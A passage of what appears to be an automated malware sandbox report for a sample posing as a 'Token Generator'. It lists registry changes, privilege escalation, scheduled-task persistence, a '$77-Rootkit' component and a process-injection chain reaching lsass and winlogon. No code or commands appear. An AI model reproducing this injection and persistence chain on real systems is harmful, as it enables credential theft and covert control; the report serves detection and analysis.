Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-711569230-3659488422-571408806-1000\{99C49BB3-2594-4ACF-9A5A-F234E33DC2A6} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 987473.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Token Generator.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\MBSetup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3276 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3276 wrote to memory of 2756 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1188 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2756 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1872 wrote to memory of 4892 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4892 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4892 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
PID 4592 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Token Generator.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4592 wrote to memory of 2396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4592 wrote to memory of 2396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4592 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
PID 4592 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4860 wrote to memory of 3524 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3524 wrote to memory of 624 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3524 wrote to memory of 684 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3524 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 340 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3524 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 996 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1052 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1104 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1220 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1264 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1452 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1460 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1468 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1628 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1684 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1716 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1804 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1848 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1880 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1888 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1952 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 1996 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 1012 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 3524 wrote to memory of 2052 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2176 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2400 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2416 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2492 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2580 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3524 wrote to memory of 2604 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 3524 wrote to memory of 2652 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3524 wrote to memory of 2696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

